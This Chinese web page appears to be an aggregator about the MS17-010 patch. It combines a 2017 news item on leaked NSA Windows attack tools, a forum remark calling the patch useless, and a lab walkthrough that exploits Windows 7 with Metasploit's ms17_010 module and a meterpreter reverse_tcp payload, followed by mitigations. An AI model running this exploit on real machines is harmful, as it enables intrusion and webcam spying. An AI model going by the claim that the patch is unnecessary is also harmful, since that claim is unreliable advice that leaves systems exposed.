前沿拓展:
微軟ms17-010補(bǔ)丁
我的情況和你一樣,重新做系統(tǒng)之后就沒(méi)事了,其實(shí)這個(gè)補(bǔ)丁裝不裝都可以!沒(méi)什么作用!
中新網(wǎng)4月20日電 近日美國(guó)國(guó)家**(NSA)的黑客武器庫(kù)遭曝光,其中有多個(gè)遠(yuǎn)程攻擊Windows系統(tǒng)的武器已在網(wǎng)上公開(kāi),任何人都可以使用NSA的武器攻擊其他電腦。對(duì)此,360安全衛(wèi)士于4月19日晚間緊急推出“NSA武器庫(kù)免疫工具”,可一鍵檢測(cè)修復(fù)漏洞、關(guān)閉高風(fēng)險(xiǎn)服務(wù),從而全面免疫預(yù)防NSA黑客武器。
NSA武器庫(kù)免疫工具下載地址:dl.360safe.com/nsa/nsatool.exe
NSA武器庫(kù)的公開(kāi)被稱為是網(wǎng)絡(luò)世界“核彈危機(jī)”,其中有十款影響Windows個(gè)人用戶的黑客工具,包括永恒之藍(lán)、永恒王者、永恒浪漫、永恒協(xié)作、翡翠纖維、古怪地鼠、愛(ài)斯基摩卷、文雅學(xué)者、日食之翼和尊重審查。這些工具能夠遠(yuǎn)程攻破全球約70%的Windows系統(tǒng),無(wú)需用戶任何**作,只要聯(lián)網(wǎng)就可以入侵電腦,就像沖擊波、震蕩波等著名蠕蟲(chóng)一樣可以瞬間血洗互聯(lián)網(wǎng),木馬黑產(chǎn)很可能改造NSA的武器攻擊普通網(wǎng)民。
據(jù)微軟官方回應(yīng),NSA武器庫(kù)攻擊的Windows系統(tǒng)漏洞已在近期補(bǔ)丁中完成修復(fù)。但是對(duì)于Windows XP、2003等失去微軟支持的系統(tǒng)版本來(lái)說(shuō),目前仍處于“裸奔”狀態(tài)。此外,由于漏洞影響全系列Windows版本,沒(méi)有及時(shí)安裝補(bǔ)丁的Win7、Win8甚至Win10用戶也處于危險(xiǎn)之中。
針對(duì)不同版本W(wǎng)indows用戶,360“NSA武器庫(kù)免疫工具”可以掃描系統(tǒng)環(huán)境,精準(zhǔn)檢測(cè)出NSA武器庫(kù)使用的漏洞是否已經(jīng)修復(fù),并提示用戶安裝相應(yīng)的補(bǔ)丁。針對(duì)XP、2003等無(wú)補(bǔ)丁的系統(tǒng)版本用戶,防御工具能夠幫助用戶關(guān)閉存在高危風(fēng)險(xiǎn)的服務(wù),從而對(duì)NSA黑客武器攻擊的系統(tǒng)漏洞徹底“免疫”。
1、EternalBlue(永恒之藍(lán)):**Bv1漏洞攻擊工具,影響全平臺(tái),已被微軟補(bǔ)丁MS17-010修復(fù)。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞,不在支持期的系統(tǒng)可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫;
2、EternalChampion(永恒王者):**Bv1漏洞攻擊工具,影響全平臺(tái),已被微軟補(bǔ)丁MS17-010修復(fù)。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞,不在支持期的系統(tǒng)可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫;
3、EternalRomance(永恒浪漫):**Bv1漏洞攻擊工具,影響全平臺(tái),已被微軟補(bǔ)丁MS17-010修復(fù)。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞,不在支持期的系統(tǒng)可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫;
4、EternalSynergy(永恒協(xié)作):**Bv3漏洞攻擊工具,影響全平臺(tái),已被微軟補(bǔ)丁MS17-010修復(fù)。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞,不在支持期的系統(tǒng)可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫;
5、EmeraldThread(翡翠纖維):**Bv1漏洞攻擊工具,影響XP和2003,已被微軟補(bǔ)丁MS10-061修復(fù),相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞;
6、ErraticGopher(古怪地鼠):**B漏洞攻擊工具,影響XP和2003,無(wú)補(bǔ)丁,相關(guān)系統(tǒng)用戶可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫;
7、EskimoRoll(愛(ài)斯基摩卷):Kerberos漏洞攻擊工具,影響2000/2003/2008/2008 R2的域控服務(wù)器,已被微軟補(bǔ)丁MS14-068修復(fù),相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞;
8、EducatedScholar(文雅學(xué)者):**B漏洞攻擊工具,影響VISTA和2008,已被微軟補(bǔ)丁MS09-050修復(fù),相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞;
9、EclipsedWing(日食之翼):Server netAPI漏洞攻擊工具,影響2008及之前的所有系統(tǒng)版本,已被微軟補(bǔ)丁MS08-067修復(fù),相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞;
10、EsteemAudit(尊重審查):RDP漏洞遠(yuǎn)程攻擊工具,影響XP和2003,無(wú)補(bǔ)丁,相關(guān)系統(tǒng)用戶可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫。
拓展知識(shí):
微軟ms17-010補(bǔ)丁
(第一次在發(fā)表文章,沒(méi)啥經(jīng)驗(yàn),分享一些學(xué)習(xí)經(jīng)驗(yàn)。大佬們多多包涵,也希望大家能夠指出我的錯(cuò)誤。)
靶機(jī):windows7 x64 IP:192.168.1.5
攻擊機(jī):Kali Rolling (2019.3) x64 IP:192.168.1.3
兩臺(tái)主機(jī)在同一網(wǎng)段內(nèi);win7關(guān)閉防火墻并且開(kāi)啟445端口。
1、使用ipconfig/ifconfig分別查看win7和kali的ip。
2、打開(kāi)msf工具
每次開(kāi)啟都會(huì)有不同的界面
3、使用search命令搜索ms17_010
4、選擇模塊和設(shè)置條件
使用use來(lái)選擇第三個(gè)模塊,可以直接 use 2,也可以打全
第二用set來(lái)設(shè)置靶機(jī)IP set rhost 192.168.1.5
設(shè)置本機(jī)IP set lhost 192.168.1.3
設(shè)置**端口 set lport 8888 不設(shè)置則默認(rèn)4444端口
設(shè)置payload set payload windows/x64/meterpreter/reverse_tcp
還有另外一個(gè)payload能用于本實(shí)驗(yàn),具體可以 show payloads 查看
最后,可以使用show options檢查所有信息
5、開(kāi)始滲透 run
稍等片刻 看到win則成功創(chuàng)建會(huì)話
6、成功之后,可以開(kāi)啟Windows7的攝像頭,截圖等等
具體可以用help查看
1、關(guān)閉445端口
2、打開(kāi)防火墻,安裝安全軟件
3、安裝對(duì)應(yīng)補(bǔ)丁,這里就不放鏈接了
關(guān)閉445端口的方法:
1)打開(kāi)控制面板—-Windows防火墻—-高級(jí)設(shè)置
2)點(diǎn)擊新建規(guī)則,設(shè)置端口號(hào)的規(guī)則并且命名(如圖)
msf工具雖然強(qiáng)大,但只能用于已知的并且已提交模塊的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻擊。而不是簡(jiǎn)單的使用工具use和set。
原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請(qǐng)注明出處:http://m.xiesong.cn/56222.html